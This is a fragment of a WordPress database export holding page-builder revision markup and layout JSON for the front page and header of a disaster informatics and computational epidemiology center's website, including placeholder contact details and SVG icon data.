<!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enable the development of inclusive public health and disaster preparedness efforts that overcome place- and context-specific access disparities </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',20,'https://gsudice.dataconn.net/?p=382',0,'revision','',0),(383,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',23,'https://gsudice.dataconn.net/?p=383',0,'revision','',0),(384,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path 